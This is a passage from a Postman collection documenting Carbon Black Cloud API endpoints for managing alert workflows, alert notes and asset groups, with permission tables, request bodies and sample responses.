(CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"40590453-74e7-4570-8a31-f835ab376115"},{"name":"Create Workflow","id":"c0f5164e-d969-4044-a8ef-34ca8f857ad3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"state\": \"<string>\",\n    \"comment\": \"<string>\",\n    \"remediation_state\": \"<string>\"\n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/workflow","description":"<p>Update the alert with the current state of the remediation.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.dismiss</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"body-schema\">Body Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Description</th>\n<th>Default</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>state</code></td>\n<td>Workflow state to filter on. Allowed values: <code>dismissed</code>, <code>open</code></td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>comment</code></td>\n<td>Comment to include with operation</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>remediation state</code></td>\n<td>Description or justification for the change. Accepts any string.</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#create-workflow\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","workflow"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c0f5164e-d969-4044-a8ef-34ca8f857ad3"},{"name":"Update Bulk Event Workflows","id":"4ff2d687-86e2-4c2e-8d7f-01a219c655b1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"comment\": \"string\",\n  \"criteria\": {\n    \"category\": [\"THREAT\"],\n    \"create_time\": {\n      \"end\": \"2019-09-17T00:03:47.277Z\",\n      \"start\": \"2019-09-17T00:03:47.277Z\"\n    },\n    \"device_id\": [324552, 12344, 997745],\n    \"device_name\": [\"hostmachine\", \"device.local\", \"DOMAIN\\\\DEVICE\"],\n    \"device_os\": [\"WINDOWS\"],\n    \"device_os_version\": [\"string\"],\n    \"device_username\": [\"string\"],\n    \"group_results\": true,\n    \"id\": [\"string\"],\n    \"legacy_alert_id\": [\"CTAS5XKG\", \"TJFY5ZBW\"],\n    \"minimum_severity\": 5,\n    \"policy_id\": [1, 525, 644],\n    \"policy_name\": [\"Default\", \"Advanced\", \"Monitored\"],\n    \"process_name\": [\"explorer.exe\", \"chrome.app\", \"setup.py\"],\n    \"process_sha256\": [\"131f95c51cc819465fa1797f6ccacf9d494aaaff46fa3eac73ae63ffbdfd8267\"],\n    \"report_id\": [\"string\"],\n    \"report_name\": [\"string\"],\n    \"reputation\": [\"KNOWN_MALWARE\"],\n    \"tag\": [\"string\"],\n    \"target_value\": [\"LOW\"],\n    \"threat_id\": [\"03ea43268c536a0bde8b765bca1696e9\", \"41edc35062138af3f1fea4b3bf7046a5\"],\n    \"type\": [\"CB_ANALYTICS\"],\n    \"watchlist_id\": [\"string\"],\n    \"watchlist_name\": [\"string\"],\n    \"workflow\": [\"OPEN\"]\n  },\n  \"query\": \"string\",\n  \"remediation_state\": \"string\",\n  \"state\": \"OPEN\"\n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/workflow/_criteria","description":"<p>Bulk update alerts’ workflow by search definition. Multiple pathways support similar request body schemas, including those listed below.</p>\n<h3 id=\"bac-permissions-required\">BAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.dismiss</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"body-schema\">Body Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Description</th>\n<th>Default</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>criteria</code></td>\n<td>Map of criteria to filter results on. Allowed values: <code>threat_id</code>, <code>target_value</code>, <code>device_id</code>, <code>device_os_versions</code>, <code>policy_id</code>, <code>device_os</code>, <code>minimum_severity</code> ,<code>create_time</code>, <code>legacy_alert_id</code>, <code>group_results</code>, <code>process_sha256</code>, <code>policy_name</code>, <code>reputation</code>, <code>type</code>, <code>id</code>, <code>category</code>, <code>device_username</code>, <code>device_name</code> , <code>tag</code>, <code>workflow</code>, <code>process_name</code></td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>query</code></td>\n<td>query to perform</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>state </code></td>\n<td>Workflow state to filter on. Allowed values: <code>dismissed</code>, <code>open</code></td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>comment</code></td>\n<td>Comment to include with operation</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>remediation state</code></td>\n<td>Description or justification for the change. Accepts any string.</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#bulk-create-workflows\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","workflow","_criteria"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4ff2d687-86e2-4c2e-8d7f-01a219c655b1"},{"name":"Get Status of Workflow Update","id":"e7536716-2d37-4c8b-8474-a6f3f3503d5a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/workflow/status/{{cb_request_id}}","description":"<p>Get the current status of a bulk workflow request.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.dismiss</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#get-status-of-workflow-update\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","workflow","status","{{cb_request_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e7536716-2d37-4c8b-8474-a6f3f3503d5a"},{"name":"Get Alert Search Suggestions","id":"2511954e-c7ae-488d-8f82-121ed9cb58a9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/search_suggestions","description":"<p>Get suggestions on keys and field values.</p>\n<h3 id=\"bac-permissions-required\">BAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#get-alert-search-suggestions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","search_suggestions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"2511954e-c7ae-488d-8f82-121ed9cb58a9"},{"name":"Create Note","id":"7acd3f13-7fcf-4a9d-be1c-9aba4c95ebb4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"note\": \"This is a note.\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes","description":"<p>Add segments of text to an alert to track notes while investigating the potential threat.</p>\n<h3 id=\"bac-permissions-required\">BAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#get-suggestions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"7acd3f13-7fcf-4a9d-be1c-9aba4c95ebb4"},{"name":"Get Notes","id":"c8f79e1d-dca3-4dc2-b25c-7556b4d8041e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes","description":"<p>Fetch the notes created for the specified alert</p>\n<p><em>Note: The UI console uses an older API currently so notes from the console will be associated with the threat_id instead of the alert_id. Therefore, the notes from the console will not be returned from this API.</em></p>\n<h3 id=\"bac-permissions-required\">BAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#get-notes\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c8f79e1d-dca3-4dc2-b25c-7556b4d8041e"},{"name":"Delete Note","id":"55150009-f4a3-4457-8640-0f03a66e76ec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes/{{cb_note_id}}","description":"<p>Deletes the specified note for the specified alert</p>\n<h3 id=\"bac-permissions-required\">BAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#delete-note\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes","{{cb_note_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"55150009-f4a3-4457-8640-0f03a66e76ec"}],"id":"09c15192-76a3-453f-a250-9b408793a9cb","description":"<p>In April 2023 the Alerts v7 API was released which includes additional information and improved dismissal workflow.</p>\n<p>The Alerts v6 API will continue to be supported for at least 12 months and will not be deprecated earlier than May 2024.</p>\n","_postman_id":"09c15192-76a3-453f-a250-9b408793a9cb","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"6f6fef25-83a5-4c3f-b091-ae6eb0826521","description":"<p>We have extended the capabilities of the <strong>Alerts API</strong> by improving the methods of retrieving alerts, and adding functionality to manage the workflow by updating the <strong>alert status</strong>. This will allow you to more efficiently call an API by providing a wider range of <strong>filterable fields</strong>, including creation time, category, type, status, tag and more, as well as the ability to <strong>dismiss alerts</strong>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/\">See Documentation</a></p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"adc3f518-65b5-4d3a-bc24-de48b3352cc2"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"2dea6462-9757-4019-9d66-cb3d3d58414a"}}],"_postman_id":"6f6fef25-83a5-4c3f-b091-ae6eb0826521","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Asset Groups","item":[{"name":"Groups","item":[{"name":"Create Asset Group","id":"eb2886bf-8478-49a8-bea5-8de38e5a3b0b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"description\": \"Test5\",\n  \"member_type\": \"DEVICE\",\n  \"name\": \"Test5\",\n  \"query\": \"os_version:Windows\",\n  \"policy_id\": 465946\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups","description":"<p>Create a new asset group. Asset groups are used to categorize and manage assets (devices or endpoints) based on specific criteria, making it easier to apply policies and perform security operations. By using dynamic criteria in the “query” parameter, you can create asset groups that adapt and change dynamically as the conditions are met, ensuring that the group always contains relevant assets.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#create-asset-group\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"description\": \"&lt;string&gt;\",\n  \"member_type\": \"&lt;string&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"query\": \"&lt;string&gt;\",\n  \"policy_id\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6aa2344e-c7f0-4b58-a26f-22164579b944","name":"Create Asset Group","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"description\": \"Test5\",\n  \"member_type\": \"DEVICE\",\n  \"name\": \"Test5\",\n  \"query\": \"os_version:Windows\",\n  \"policy_id\": 465946\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:06:37 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"344"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=B024A7EEE937CEDA1F4234FF1AB1126D; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"f2004957-abcd-abcd-921f-8dd70c9c1185\",\n    \"name\": \"Test5\",\n    \"description\": \"Test5\",\n    \"org_key\": \"abcd1234\",\n    \"status\": \"UPDATING\",\n    \"member_type\": \"DEVICE\",\n    \"discovered\": false,\n    \"create_time\": \"2023-11-27T17:06:37.578Z\",\n    \"update_time\": \"2023-11-27T17:06:37.578Z\",\n    \"query\": \"os_version:Windows\",\n    \"member_count\": 0,\n    \"policy_id\": 465946,\n    \"policy_name\": \"Testing\"\n}"}],"_postman_id":"eb2886bf-8478-49a8-bea5-8de38e5a3b0b"},{"name":"Preview Asset Groups Change","id":"212c24d2-859a-4a94-bcfd-4936baa6cb55","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"ASSET_GROUPS_UPDATE\",\n  \"description\": \"preview asset groups update\",\n  \"policy_id\": 465946,\n  \"asset_group_ids\": [\n    \"6459233a-3b5c-4982-9f34-731542524e37\"\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policy-assignment/v1/orgs/{{cb_org_key}}/asset-groups/preview","description":"<p>Preview changes related to asset groups within an organization, such as adding or removing members, creating or updating asset groups, and managing policy overrides.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#preview-asset-groups-change\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"action\": \"&lt;string&gt;\",\n  \"asset_ids\": &lt;integer&gt;,\n  \"asset_group_query\": \"&lt;string&gt;\",\n  \"description\": \"&lt;string&gt;\",\n  \"policy_id\": &lt;integer&gt;,\n  \"asset_group_ids\": [\n    \"&lt;string&gt;\"\n  ],\n  \"assets_search_definition\": {\n    \"criteria\": {\n      \"&lt;key&gt;\": \"&lt;value&gt;\"\n    },\n    \"start\": &lt;integer&gt;,\n    \"rows\": &lt;integer&gt;,\n    \"query\": \"&lt;string&gt;\"\n  }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policy-assignment","v1","orgs","{{cb_org_key}}","asset-groups","preview"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"849b8b10-a5c6-49a4-8ef1-02d363f9ce16","name":"Preview Asset Groups Change","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"ASSET_GROUPS_UPDATE\",\n  \"description\": \"preview asset groups update\",\n  \"policy_id\": 465946,\n  \"asset_group_ids\": [\n    \"6459233a-3b5c-4982-9f34-731542524e37\"\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policy-assignment/v1/orgs/{{cb_org_key}}/asset-groups/preview"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 Jan 2024 11:12:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"934"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Logtraceid","value":"db768dbc-575d-44a6-aa58-13b1ef0893e8"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=5F379B23D11E092DEB0E7EB862077CDD; Path=/policy-assignment; Secure; HttpOnly"},{"key":"Strict-Transport-Security","value":"max-age=15724800; includeSubDomains"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"preview\": [\n        {\n            \"current_policy\": {\n                \"id\": 20314731,\n                \"position\": 4\n            },\n            \"new_policy\": {\n                \"id\": 465946,\n                \"position\": 1\n            },\n            \"asset_count\": 24,\n            \"asset_query\": \"(ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:2a6923397427fe4ffd030c6942814945668ca97588a40359ea085b7211dca08f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:84982a450d3db4f41c56ae897d8d8cf825377a1b56fab82ba76a1dcf7456d943 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:db51c36492ba4774816f80cfab2b3a5e50a0f82d4c0469f2477d3b70eb92a11f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:2a6923397427fe4ffd030c6942814945668ca97588a40359ea085b7211dca08f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:4e2ebb14e27c7973236d1a88c46d048c89a5dc45f1d230bc6bf65d1c0f6ebd3f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:678fad1d2b705c3d1926e7c5818ca0486aa57fea1e7a2f9656a3aaee02115e13 AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:e380552e82fbd5b5808cb16127dfe80ad528f332de04f6b563706b2b1205659e AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false)\",\n            \"assets_search_definition\": {\n                \"query\": \"(ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:2a6923397427fe4ffd030c6942814945668ca97588a40359ea085b7211dca08f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:84982a450d3db4f41c56ae897d8d8cf825377a1b56fab82ba76a1dcf7456d943 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:f6da4be136f36c87c8948e76d3d1155d4132848f721e4a7c07c64e0070ace373 AND ag_agg_key_dynamic:db51c36492ba4774816f80cfab2b3a5e50a0f82d4c0469f2477d3b70eb92a11f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:2a6923397427fe4ffd030c6942814945668ca97588a40359ea085b7211dca08f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:4e2ebb14e27c7973236d1a88c46d048c89a5dc45f1d230bc6bf65d1c0f6ebd3f AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:678fad1d2b705c3d1926e7c5818ca0486aa57fea1e7a2f9656a3aaee02115e13 AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false) OR (ag_agg_key_manual:e380552e82fbd5b5808cb16127dfe80ad528f332de04f6b563706b2b1205659e AND ag_agg_key_dynamic:20ec063296de7746ecfe2cfe372eedc1e1553514d06a625369f39de7ee6f5e67 AND policy_id:20314731 AND policy_override:false)\"\n            }\n        },\n        {\n            \"current_policy\": {\n                \"id\": 7784574,\n                \"position\": 5\n            },\n            \"new_policy\": {\n                \"id\": 465946,\n                \"position\": 1\n            },\n            \"asset_count\": 9,\n            \"asset_query\": \"(ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:002a93942a1bb20b7b80a92fd1739a3f2953f71ea358f35bf19ac233984e392d AND policy_id:7784574 AND policy_override:false) OR (ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:c4e9bd76791f48731099dcb99e963aff38666f5533506689fd0f9d6b5d49ff19 AND policy_id:7784574 AND policy_override:false) OR 